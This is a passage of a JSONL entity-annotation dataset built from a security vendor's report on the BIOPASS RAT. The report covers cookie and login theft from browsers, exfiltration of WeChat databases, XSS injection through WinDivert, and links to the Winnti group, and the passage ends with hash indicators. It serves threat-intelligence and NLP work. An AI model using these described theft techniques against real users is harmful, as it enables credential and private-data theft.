browsers.","entities":[{"id":48387,"label":"SOFTWARE","start_offset":66,"end_offset":79}],"relations":[],"Comments":[]} {"id":3304,"text":"Depending on the different argument “type” delivered with the command, it performs different behaviors.","entities":[],"relations":[],"Comments":[]} {"id":3305,"text":"If the value of the “type” argument is “Chrome”, it will use the AES secret key or DPAPI (for Chrome versions before 80) to decrypt the cookie file.","entities":[{"id":48388,"label":"SOFTWARE","start_offset":94,"end_offset":100}],"relations":[],"Comments":[]} {"id":3306,"text":"The decrypted result will be sent to the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":3307,"text":" Figure 23.","entities":[],"relations":[],"Comments":[]} {"id":3308,"text":"The script to decrypt Chrome’s file with AES or DPAPI decryption If the value of the “type” argument is “File”","entities":[{"id":48389,"label":"SOFTWARE","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} {"id":3309,"text":", it will directly upload the cookie file to cloud storage.","entities":[],"relations":[],"Comments":[]} {"id":3310,"text":"The command that we received showed that the targeted browsers include Google Chrome, Microsoft Edge Beta, 360 Chrome, QQ Browser, 2345 Explorer, Sogou Explorer, and 360 Safe Browser.","entities":[{"id":48390,"label":"SOFTWARE","start_offset":71,"end_offset":84},{"id":48394,"label":"SOFTWARE","start_offset":131,"end_offset":144},{"id":48395,"label":"SOFTWARE","start_offset":146,"end_offset":160},{"id":48396,"label":"SOFTWARE","start_offset":166,"end_offset":182},{"id":48391,"label":"SOFTWARE","start_offset":86,"end_offset":105},{"id":48392,"label":"SOFTWARE","start_offset":107,"end_offset":117},{"id":48393,"label":"SOFTWARE","start_offset":119,"end_offset":129}],"relations":[],"Comments":[]} {"id":3311,"text":" Figure 24.","entities":[],"relations":[],"Comments":[]} {"id":3312,"text":"Code showing the command to target Sogou Explorer GetBrowsersLogins","entities":[{"id":48397,"label":"SOFTWARE","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} {"id":3313,"text":"This command has a nearly identical function to “GetBrowsersCookies”, although it targets a browser’s “Login Data” files instead.","entities":[],"relations":[],"Comments":[]} {"id":3314,"text":"Additional Findings on BIOPASS RAT ","entities":[{"id":10040,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} {"id":3315,"text":"Although these are not implemented inside the BIOPASS RAT malware, we have observed two additional plug-ins that are written in Python (“getwechatdb” and “xss_spoof”) and were deployed by the threat actor to a victim who had been infected with Cobalt Strike.","entities":[{"id":48398,"label":"malware","start_offset":46,"end_offset":57},{"id":48399,"label":"SOFTWARE","start_offset":128,"end_offset":134},{"id":48400,"label":"tools","start_offset":244,"end_offset":257}],"relations":[{"id":409,"from_id":48398,"to_id":48400,"type":"uses"}],"Comments":[]} {"id":3316,"text":"The script “getwechatdb” is used for exfiltrating the chat history from the WeChat Windows client.","entities":[{"id":48401,"label":"SOFTWARE","start_offset":76,"end_offset":97}],"relations":[],"Comments":[]} {"id":3317,"text":"The script will detect the version of the installed WeChat client and grab the decryption key and the user ID.","entities":[{"id":48402,"label":"SOFTWARE","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} {"id":3318,"text":"The predefined list of offsets is used to locate where the decryption key and the user ID are embedded.","entities":[],"relations":[],"Comments":[]} {"id":3319,"text":"The list supports 36 different versions of memory offsets for the message client.","entities":[],"relations":[],"Comments":[]} {"id":3320,"text":" The script will then upload database files inside the WeChat folder including “MicroMsg.db” to cloud storage.","entities":[{"id":48403,"label":"SOFTWARE","start_offset":55,"end_offset":61},{"id":48404,"label":"FILEPATH","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} {"id":3321,"text":"These database files are used for saving the chat history.","entities":[],"relations":[],"Comments":[]} {"id":3322,"text":"Finally, the script will print out the client ID and the decryption key that allows the malicious actors to decrypt the stolen database files of the chat history.","entities":[],"relations":[],"Comments":[]} {"id":3323,"text":" Figure 25.","entities":[],"relations":[],"Comments":[]} {"id":3324,"text":"A predefined list of memory offset intended to grab information from different versions of WeChat Figure 26.","entities":[{"id":48405,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} {"id":3325,"text":"The script used to exfiltrate WeChat chat database files The other plug-in, “xss_spoof”, is an archive that contains multiple Python scripts.","entities":[{"id":48406,"label":"SOFTWARE","start_offset":30,"end_offset":36}],"relations":[],"Comments":[]} {"id":3326,"text":"The scripts are designed for web server infection via a cross-site scripting (XSS) attack.","entities":[{"id":48407,"label":"attack-pattern","start_offset":56,"end_offset":89}],"relations":[],"Comments":[]} {"id":3327,"text":"This plug-in can inject malicious scripts into the response of the victim’s web server by leveraging the WinDivert package, which is used to sniff and manipulate the network traffic on Windows.","entities":[{"id":48408,"label":"SOFTWARE","start_offset":105,"end_offset":114},{"id":48409,"label":"SOFTWARE","start_offset":185,"end_offset":192}],"relations":[],"Comments":[]} {"id":3328,"text":"The scripts intercept HTTP GET requests that are sent to port 80.","entities":[],"relations":[],"Comments":[]} {"id":3329,"text":"An “ignore” list is used to filter the file extensions of URLs to avoid manipulating resources that are not JavaScript or HTML.","entities":[],"relations":[],"Comments":[]} {"id":3330,"text":"The script then modifies the original JavaScript or HTML content and delivers it to website visitors.","entities":[],"relations":[],"Comments":[]} {"id":3331,"text":" Figure 27.","entities":[],"relations":[],"Comments":[]} {"id":3332,"text":"The JavaScript payload used to replace the original script of compromised websites The delivered script is almost the same as the malicious script previously discussed in the section on the watering hole attack.","entities":[{"id":48410,"label":"attack-pattern","start_offset":194,"end_offset":214}],"relations":[],"Comments":[]} {"id":3333,"text":"The script performs checks by scanning localhost to determine if the machine is infected by BIOPASS RAT while showing the fake updated webpages.","entities":[{"id":10089,"label":"malware","start_offset":92,"end_offset":103}],"relations":[],"Comments":[]} {"id":3334,"text":"It is likely that the malicious actors compromised the web servers first and then ran “xss_spoof” for propagation.","entities":[],"relations":[],"Comments":[]} {"id":3335,"text":" Figure 28.","entities":[],"relations":[],"Comments":[]} {"id":3336,"text":"The main script used to manipulate traffic with WinDivert Potential links with the Winnti group","entities":[{"id":48944,"label":"threat-actor","start_offset":87,"end_offset":99},{"id":48943,"label":"tools","start_offset":48,"end_offset":57}],"relations":[{"id":505,"from_id":48944,"to_id":48943,"type":"uses"}],"Comments":[]} {"id":3337,"text":"We have found several connections between BIOPASS RAT and the Winnti Group:","entities":[{"id":10096,"label":"malware","start_offset":42,"end_offset":53},{"id":48945,"label":"threat-actor","start_offset":62,"end_offset":74}],"relations":[{"id":506,"from_id":48945,"to_id":10096,"type":"uses"}],"Comments":[]} {"id":3338,"text":"1. We discovered that many BIOPASS RAT loader binaries were signed with two valid certificates.","entities":[{"id":48946,"label":"malware","start_offset":32,"end_offset":43}],"relations":[],"Comments":[]} {"id":3340,"text":"It is well known that the Winnti Group has previously used stolen certificates from game studios to sign its malware.","entities":[{"id":48950,"label":"attack-pattern","start_offset":59,"end_offset":78},{"id":48949,"label":"threat-actor","start_offset":26,"end_offset":38}],"relations":[{"id":507,"from_id":48949,"to_id":48950,"type":"uses"}],"Comments":[]} {"id":3341,"text":" Certificate Thumbprint Valid From Valid To EFB70718BC00393A01694F255A28E30E9D2142A4 12:00 a.m., Jan. 2, 2019 11:59 p.m., Mar. 2, 2021 8CE020AA874902C532B9911A4DCA8EFFA627DC80 12:00 a.m., Sept. 6, 2018 11:59 p.m., Oct. 5, 2021 Table 3.","entities":[{"id":48951,"label":"TIME","start_offset":89,"end_offset":114},{"id":48952,"label":"TIME","start_offset":116,"end_offset":140},{"id":48954,"label":"TIME","start_offset":211,"end_offset":235},{"id":48953,"label":"TIME","start_offset":184,"end_offset":209}],"relations":[],"Comments":[]} {"id":3342,"text":"Information from the stolen certificates 2. While checking the stolen certificates, we found a server-side variant of the Derusbi malware sample (e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783) that was signed with the same stolen certificate.","entities":[{"id":10119,"label":"SHA2","start_offset":153,"end_offset":217},{"id":48955,"label":"malware","start_offset":129,"end_offset":144}],"relations":[{"id":508,"from_id":10119,"to_id":48955,"type":"indicates"}],"Comments":[]} {"id":3343,"text":" Derusbi is known to be used by multiple advanced persistent threat (APT) groups.","entities":[{"id":10121,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":3344,"text":"The server-side variant has also been noted to be used as a malware loader by the Winnti Group.","entities":[{"id":48956,"label":"threat-actor","start_offset":82,"end_offset":94}],"relations":[],"Comments":[]} {"id":3345,"text":"3. We found an interesting Cobalt Strike loader (a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97) that embeds a URL that leads to the BIOPASS RAT loader.","entities":[{"id":10125,"label":"SHA2","start_offset":54,"end_offset":118},{"id":10126,"label":"malware","start_offset":156,"end_offset":167},{"id":48957,"label":"tools","start_offset":32,"end_offset":45}],"relations":[{"id":509,"from_id":10125,"to_id":48957,"type":"indicates"},{"id":510,"from_id":10125,"to_id":10126,"type":"drops"}],"Comments":[]} {"id":3346,"text":"However, the URL is unused and was likely left inside the loader as a mistake.","entities":[],"relations":[],"Comments":[]} {"id":3348,"text":"The Cobalt Strike loader, which has a PDB string “C:\\Users\\test\\Desktop\\fishmaster\\x64\\Release\\fishmaster.pdb”, connects to the C&C server “download[.]google-images[.]ml”.","entities":[{"id":48959,"label":"tools","start_offset":4,"end_offset":17},{"id":48960,"label":"FILEPATH","start_offset":50,"end_offset":109},{"id":48961,"label":"DOMAIN","start_offset":140,"end_offset":169}],"relations":[{"id":511,"from_id":48960,"to_id":48959,"type":"indicates"},{"id":514,"from_id":48959,"to_id":48961,"type":"beacons-to"}],"Comments":[]} {"id":3349,"text":"The domains and the PDB string have been mentioned in a recent report and have been attributed to the Winnti Group.","entities":[{"id":48962,"label":"threat-actor","start_offset":102,"end_offset":114}],"relations":[],"Comments":[]} {"id":3350,"text":"While these connections allow us to link the malware to the Winnti Group, the different targets between BIOPASS RAT and the current operations by Winnti’s that we are tracking makes associating the two more difficult.","entities":[{"id":48963,"label":"threat-actor","start_offset":60,"end_offset":72},{"id":48964,"label":"malware","start_offset":104,"end_offset":115},{"id":48965,"label":"threat-actor","start_offset":146,"end_offset":152}],"relations":[{"id":515,"from_id":48963,"to_id":48964,"type":"uses"}],"Comments":[]} {"id":3351,"text":"BIOPASS RAT highlights the importance of downloading from trusted sources BIOPASS RAT is a sophisticated type of malware that is implemented as Python scripts.","entities":[{"id":48967,"label":"malware","start_offset":74,"end_offset":85},{"id":48966,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3352,"text":"It possesses many features, such as the ability to use scheduled tasks as a method of maintaining persistence in the infected system.","entities":[],"relations":[],"Comments":[]} {"id":3353,"text":" The malware abuses publicly available tools and cloud services for its malicious behavior.","entities":[],"relations":[],"Comments":[]} {"id":3355,"text":"Given that the malware loader was delivered as an executable disguised as a legitimate update installer on a compromised website, we advise users to be careful with regard to the applications that they download.","entities":[],"relations":[],"Comments":[]} {"id":3356,"text":"As much as possible, it is recommended to download apps only from trusted sources and official websites to avoid being compromised by attacks such as the one discussed here.","entities":[],"relations":[],"Comments":[]} {"id":3357,"text":"Organizations can also help protect their end users by implementing security solutions that provide a multilayered defense system that helps with detecting, scanning, and blocking malicious URLs.","entities":[],"relations":[],"Comments":[]} {"id":3358,"text":"Note that we’ve submitted an abuse report to Alibaba, but we have yet to receive feedback at the time of publication.","entities":[{"id":48969,"label":"identity","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} {"id":3359,"text":"Indicators of Compromise (IoCs) SHA256 Filename Note Analysis 84fbf74896d2a1b62d73b9a5d0be2f627d522fc811fe08044e5485492d2d4249 big.txt BIOPASS RAT Python Script (Version 3) TrojanSpy.Python.BIOPASS.A f3c96145c9d6972df265e12accfcd1588cee8af1b67093011e31b44d0200871f c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A 0f8a87ca5f94949904804442c1a0651f99ba17ecf989f46a3b2fde8de455c4a4 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A d8b1c4ad8f31c735c51cb24e9f767649f78ef5c571769fbaac9891c899c33444 c1222.txt BIOPASS RAT Python Script (C1222 module) ","entities":[{"id":10167,"label":"SHA1","start_offset":71,"end_offset":135},{"id":10168,"label":"malware","start_offset":146,"end_offset":157},{"id":10169,"label":"SHA1","start_offset":213,"end_offset":277},{"id":10170,"label":"malware","start_offset":290,"end_offset":301},{"id":10171,"label":"SHA2","start_offset":357,"end_offset":421},{"id":10172,"label":"malware","start_offset":434,"end_offset":445},{"id":10173,"label":"SHA2","start_offset":501,"end_offset":565},{"id":10174,"label":"malware","start_offset":578,"end_offset":589},{"id":48970,"label":"FILEPATH","start_offset":137,"end_offset":144},{"id":48972,"label":"FILEPATH","start_offset":279,"end_offset":288},{"id":48975,"label":"malware","start_offset":476,"end_offset":499},{"id":48976,"label":"FILEPATH","start_offset":567,"end_offset":576},{"id":48974,"label":"FILEPATH","start_offset":423,"end_offset":432},{"id":48971,"label":"malware","start_offset":185,"end_offset":211},{"id":48973,"label":"malware","start_offset":332,"end_offset":355}],"relations":[{"id":516,"from_id":10167,"to_id":10168,"type":"indicates"},{"id":517,"from_id":48970,"to_id":10168,"type":"indicates"},{"id":519,"from_id":48970,"to_id":10167,"type":"duplicate-of"},{"id":520,"from_id":10168,"to_id":48971,"type":"duplicate-of"},{"id":521,"from_id":10169,"to_id":10170,"type":"indicates"},{"id":522,"from_id":48972,"to_id":10170,"type":"indicates"},{"id":523,"from_id":48972,"to_id":10169,"type":"duplicate-of"},{"id":524,"from_id":48973,"to_id":10170,"type":"duplicate-of"},{"id":525,"from_id":10171,"to_id":10172,"type":"indicates"},{"id":526,"from_id":48974,"to_id":10172,"type":"indicates"},{"id":527,"from_id":48975,"to_id":10172,"type":"duplicate-of"},{"id":528,"from_id":48974,"to_id":10171,"type":"duplicate-of"},{"id":529,"from_id":10173,"to_id":10174,"type":"indicates"},{"id":530,"from_id":48976,"to_id":10174,"type":"indicates"},{"id":531,"from_id":48976,"to_id":10173,"type":"duplicate-of"}],"Comments":[]} {"id":3360,"text":"Trojan.","entities":[],"relations":[],"Comments":[]} {"id":3361,"text":"Python.BIOPASS.A ee4150f18ed826c032e7407468beea3b1f738ba80b75a6be21bb8d59ee345466","entities":[{"id":10175,"label":"SHA2","start_offset":18,"end_offset":82},{"id":48977,"label":"malware","start_offset":0,"end_offset":16}],"relations":[{"id":532,"from_id":10175,"to_id":48977,"type":"indicates"}],"Comments":[]} {"id":3362,"text":"c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10176,"label":"malware","start_offset":11,"end_offset":22},{"id":48978,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":533,"from_id":48978,"to_id":10176,"type":"indicates"}],"Comments":[]} {"id":3363,"text":".Python.BIOPASS.A 34be85754a84cc44e5bb752ee3a95e2832e7be1f611dd99e9a1233c812a6dad2 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10177,"label":"SHA2","start_offset":19,"end_offset":83},{"id":10178,"label":"malware","start_offset":96,"end_offset":107},{"id":48979,"label":"malware","start_offset":0,"end_offset":17},{"id":48980,"label":"FILEPATH","start_offset":85,"end_offset":94}],"relations":[{"id":534,"from_id":48979,"to_id":10178,"type":"duplicate-of"},{"id":535,"from_id":48980,"to_id":10177,"type":"duplicate-of"},{"id":536,"from_id":10177,"to_id":10178,"type":"indicates"},{"id":537,"from_id":48980,"to_id":10178,"type":"indicates"}],"Comments":[]} {"id":3364,"text":".Python.BIOPASS.A 30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10180,"label":"malware","start_offset":98,"end_offset":109},{"id":10179,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48981,"label":"malware","start_offset":1,"end_offset":17},{"id":48982,"label":"FILEPATH","start_offset":85,"end_offset":96}],"relations":[{"id":538,"from_id":48982,"to_id":10179,"type":"duplicate-of"},{"id":539,"from_id":10179,"to_id":10180,"type":"indicates"},{"id":540,"from_id":48982,"to_id":10180,"type":"indicates"},{"id":541,"from_id":48981,"to_id":10180,"type":"duplicate-of"}],"Comments":[]} {"id":3365,"text":".Python.BIOPASS.A f21decb19da8d8c07066a78839ffd8af6721b1f4323f10a1df030325a1a5e159 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module)","entities":[{"id":10182,"label":"malware","start_offset":98,"end_offset":109},{"id":10181,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48983,"label":"FILEPATH","start_offset":85,"end_offset":96},{"id":48984,"label":"malware","start_offset":1,"end_offset":17}],"relations":[{"id":542,"from_id":10181,"to_id":10182,"type":"indicates"},{"id":543,"from_id":48983,"to_id":10182,"type":"indicates"},{"id":544,"from_id":48983,"to_id":10181,"type":"duplicate-of"},{"id":545,"from_id":48984,"to_id":10182,"type":"duplicate-of"}],"Comments":[]} {"id":3366,"text":"Trojan.","entities":[],"relations":[],"Comments":[]} {"id":3367,"text":"Python.BIOPASS.A","entities":[{"id":48985,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} {"id":3368,"text":" 40ab025d455083500bfb0c7c64e78967d4d06f91580912dccf332498681ebaf6","entities":[{"id":10183,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3369,"text":"cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10184,"label":"malware","start_offset":13,"end_offset":24},{"id":48986,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[{"id":547,"from_id":48986,"to_id":10184,"type":"indicates"}],"Comments":[]} {"id":3370,"text":".Python.BIOPASS.A e479823aa41d3f6416233dba8e765cf2abaa38ad18328859a20b88df7f1d88d5 sc2.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A e567fd0f08fdafc5a89c9084373f3308ef464918ff7e4ecd7fb3135d777e946d sc3.txt","entities":[{"id":10186,"label":"malware","start_offset":94,"end_offset":105},{"id":10187,"label":"tools","start_offset":114,"end_offset":127},{"id":10188,"label":"SHA2","start_offset":164,"end_offset":228},{"id":10185,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48989,"label":"malware","start_offset":139,"end_offset":162},{"id":48987,"label":"malware","start_offset":1,"end_offset":17},{"id":48988,"label":"FILEPATH","start_offset":85,"end_offset":92},{"id":48990,"label":"FILEPATH","start_offset":230,"end_offset":237}],"relations":[{"id":548,"from_id":10185,"to_id":10186,"type":"indicates"},{"id":549,"from_id":48988,"to_id":10186,"type":"indicates"},{"id":553,"from_id":10187,"to_id":48989,"type":"related-to"},{"id":550,"from_id":48987,"to_id":10186,"type":"duplicate-of"},{"id":551,"from_id":10185,"to_id":48988,"type":"duplicate-of"},{"id":552,"from_id":10186,"to_id":10187,"type":"uses"},{"id":554,"from_id":10188,"to_id":48989,"type":"indicates"},{"id":555,"from_id":48990,"to_id":48989,"type":"indicates"},{"id":556,"from_id":48989,"to_id":10186,"type":"duplicate-of"}],"Comments":[]} {"id":3371,"text":"BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A 0c8c11d0206c223798d83d8498bb21231bbeb30536a20ea29a5d9273bc63313d s.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A 2beabd8a9d9a485ab6d850f67ec25abbd66bf97b933ecc13cf0d63198e9ba26e x.txt Python script of Cobalt Strike shellcode loader Trojan.Python.COBEACON.A 00977e254e744d4a242b552d055afe9d6429a5c3adb4ba169f302a53ba31795d 1-CS-443.lua LUA script of Cobalt Strike shellcode loader Trojan.Win32.COBEACON.BG dbb6c40cb1a49f4d1a5adc7f215e8e15f80b9f0b11db34c84e74a99e41671e06 Online.txt BIOPASS RAT Python Script (local online server) Trojan.Python.BIOPASS.A 943e8c9b0a0a37237ec429cb8a3ff3b39097949e6c57baf43918a34b0110dd8f getwechatdb.txt BIOPASS RAT Python Script (getwechatdb plugin script) TrojanSpy.Python.BIOPASS.A 760fe7645134100301c69289a366bb92ab14927a7fbb9b405c1352989f16488c wechat.txt BIOPASS RAT Python Script (getwechatdb plugin script) TrojanSpy.Python.BIOPASS.A bdf7ebb2b38ea0c3dfb13da5d9cc56bf439d0519b29c3da61d2b2c0ab5bc6011 xss_spoof.zip BIOPASS RAT Python Script (xss_spoof plugin package) Trojan.Python.BIOPASS.A e3183f52a388774545882c6148613c67a99086e5eb8d17a37158fc599ba8254b x.js XSS watering hole attack script Trojan.JS.BIOPASS.A d3956e237066a7c221cc4aaec27935d53f14db8ab4b1c018c84f6fccfd5d0058 script.txt XSS attack JavaScript payload Trojan.JS.BIOPASS.A 4e804bde376dc02daedf7674893470be633f8e2bda96fa64878bb1fcf3209f60 xss.txt XSS attack HTML payload Trojan.HTML.BIOPASS.A 05d1c273a4caeae787b2c3faf381b5480b27d836cd6e41266f3eb505dcee6186 flash.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 09530096643b835cff71a1e48020866fd0d4d0f643fe07f96acdcd06ce11dfa4 test-ticker.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10189,"label":"malware","start_offset":0,"end_offset":11},{"id":10190,"label":"tools","start_offset":20,"end_offset":33},{"id":10191,"label":"SHA2","start_offset":70,"end_offset":134},{"id":10192,"label":"malware","start_offset":143,"end_offset":154},{"id":10194,"label":"SHA2","start_offset":213,"end_offset":277},{"id":10196,"label":"SHA2","start_offset":361,"end_offset":425},{"id":10198,"label":"SHA2","start_offset":513,"end_offset":577},{"id":10199,"label":"malware","start_offset":591,"end_offset":602},{"id":10200,"label":"SHA2","start_offset":665,"end_offset":729},{"id":10201,"label":"malware","start_offset":748,"end_offset":759},{"id":10203,"label":"malware","start_offset":909,"end_offset":920},{"id":10204,"label":"SHA2","start_offset":992,"end_offset":1056},{"id":10205,"label":"malware","start_offset":1073,"end_offset":1084},{"id":10214,"label":"malware","start_offset":1608,"end_offset":1619},{"id":10215,"label":"SHA2","start_offset":1654,"end_offset":1718},{"id":10216,"label":"malware","start_offset":1737,"end_offset":1748},{"id":10193,"label":"tools","start_offset":163,"end_offset":176},{"id":10202,"label":"SHA2","start_offset":831,"end_offset":895},{"id":10206,"label":"SHA2","start_offset":1152,"end_offset":1216},{"id":10211,"label":"SHA2","start_offset":1408,"end_offset":1472},{"id":10213,"label":"SHA2","start_offset":1531,"end_offset":1595},{"id":48995,"label":"malware","start_offset":335,"end_offset":359},{"id":48996,"label":"malware","start_offset":428,"end_offset":440},{"id":49000,"label":"FILEPATH","start_offset":731,"end_offset":746},{"id":49007,"label":"attack-pattern","start_offset":1224,"end_offset":1255},{"id":49008,"label":"malware","start_offset":1257,"end_offset":1276},{"id":49009,"label":"SHA2","start_offset":1278,"end_offset":1342},{"id":49010,"label":"FILEPATH","start_offset":1344,"end_offset":1354},{"id":49002,"label":"FILEPATH","start_offset":897,"end_offset":907},{"id":49012,"label":"malware","start_offset":1387,"end_offset":1406},{"id":48998,"label":"FILEPATH","start_offset":579,"end_offset":589},{"id":49001,"label":"malware","start_offset":803,"end_offset":829},{"id":49004,"label":"FILEPATH","start_offset":1058,"end_offset":1071},{"id":49005,"label":"malware","start_offset":1127,"end_offset":1150},{"id":49006,"label":"FILEPATH","start_offset":1218,"end_offset":1222},{"id":49011,"label":"attack-pattern","start_offset":1356,"end_offset":1366},{"id":48991,"label":"malware","start_offset":45,"end_offset":68},{"id":48992,"label":"FILEPATH","start_offset":136,"end_offset":141},{"id":48993,"label":"malware","start_offset":188,"end_offset":211},{"id":48994,"label":"FILEPATH","start_offset":279,"end_offset":284},{"id":48997,"label":"malware","start_offset":488,"end_offset":512},{"id":48999,"label":"malware","start_offset":640,"end_offset":663},{"id":49003,"label":"malware","start_offset":964,"end_offset":990},{"id":49013,"label":"FILEPATH","start_offset":1474,"end_offset":1481},{"id":49014,"label":"attack-pattern","start_offset":1483,"end_offset":1493},{"id":49015,"label":"malware","start_offset":1508,"end_offset":1529},{"id":49016,"label":"FILEPATH","start_offset":1597,"end_offset":1606},{"id":49017,"label":"malware","start_offset":1628,"end_offset":1652},{"id":49018,"label":"FILEPATH","start_offset":1720,"end_offset":1735}],"relations":[],"Comments":[]} {"id":3372,"text":"Win32.BIOPASS.A","entities":[{"id":49019,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3373,"text":" 0b16dfa3e0bbcc7b04a9a43309e911059a4d8c5892b1068e0441b177960d3eee","entities":[{"id":10217,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3374,"text":"Silverlight_ins.exe BIOPASS RAT Loader","entities":[{"id":10218,"label":"malware","start_offset":21,"end_offset":32},{"id":49020,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[{"id":557,"from_id":49020,"to_id":10218,"type":"indicates"}],"Comments":[]} {"id":3375,"text":" Backdoor.Win64.BIOPASS.A 0f18694b400e14eb995003541f16f75a5afc2478cc415a6295d171ba93565a82 flash_installer.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 11b785e77cbfa2d3849575cdfabd85d41bae3f2e0d33a77e7e2c46a45732d6e4 System.exe","entities":[{"id":10219,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10220,"label":"malware","start_offset":114,"end_offset":125},{"id":49022,"label":"FILEPATH","start_offset":93,"end_offset":112},{"id":10221,"label":"SHA2","start_offset":160,"end_offset":224},{"id":49021,"label":"malware","start_offset":1,"end_offset":25},{"id":49023,"label":"malware","start_offset":134,"end_offset":158},{"id":49024,"label":"FILEPATH","start_offset":226,"end_offset":236}],"relations":[{"id":558,"from_id":10219,"to_id":10220,"type":"indicates"},{"id":559,"from_id":49022,"to_id":10220,"type":"indicates"},{"id":560,"from_id":10221,"to_id":49023,"type":"indicates"},{"id":561,"from_id":49024,"to_id":49023,"type":"indicates"},{"id":562,"from_id":49023,"to_id":10220,"type":"duplicate-of"},{"id":563,"from_id":49021,"to_id":10220,"type":"duplicate-of"},{"id":564,"from_id":10219,"to_id":49022,"type":"duplicate-of"},{"id":565,"from_id":10221,"to_id":49024,"type":"duplicate-of"}],"Comments":[]} {"id":3376,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10222,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3377,"text":"Win64.BIOPASS.A","entities":[{"id":49025,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} {"id":3378,"text":" 2243c10b1bd64dfb55eda08bc8b85610d7fa5ba759527b4b4dd16dfac584ef25","entities":[{"id":10223,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} {"id":3379,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 281c938448e32eb12fe8c5439ef06cea848668cf57fed5ad64b9a8d1e07de561","entities":[{"id":10224,"label":"malware","start_offset":11,"end_offset":22},{"id":10225,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49026,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49027,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":566,"from_id":49026,"to_id":10224,"type":"indicates"},{"id":567,"from_id":10225,"to_id":10224,"type":"indicates"},{"id":568,"from_id":49027,"to_id":10224,"type":"duplicate-of"},{"id":569,"from_id":49026,"to_id":10225,"type":"duplicate-of"}],"Comments":[]} {"id":3380,"text":"flash1.exe ","entities":[{"id":49028,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":3381,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 2b580af1cdc4655ae75ef503aba7600e05cdd68b056a9354a2184b7fbb24db6f Silverlight_ins.exe ","entities":[{"id":10226,"label":"malware","start_offset":0,"end_offset":11},{"id":10227,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49029,"label":"malware","start_offset":20,"end_offset":44},{"id":49030,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":570,"from_id":10226,"to_id":49029,"type":"duplicate-of"},{"id":571,"from_id":10227,"to_id":49029,"type":"indicates"},{"id":572,"from_id":49030,"to_id":49029,"type":"indicates"},{"id":573,"from_id":49030,"to_id":10227,"type":"duplicate-of"}],"Comments":[]} {"id":3382,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 30a65a54acfbf8d412ade728cad86c5c769befa4e456f7c0e552e1ab0862a446 flash-64.exe","entities":[{"id":10228,"label":"malware","start_offset":0,"end_offset":11},{"id":10229,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49032,"label":"FILEPATH","start_offset":112,"end_offset":124},{"id":49031,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":574,"from_id":49032,"to_id":10229,"type":"duplicate-of"},{"id":575,"from_id":10228,"to_id":49031,"type":"duplicate-of"},{"id":576,"from_id":49032,"to_id":49031,"type":"indicates"},{"id":577,"from_id":10229,"to_id":49031,"type":"indicates"}],"Comments":[]} {"id":3383,"text":"BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe 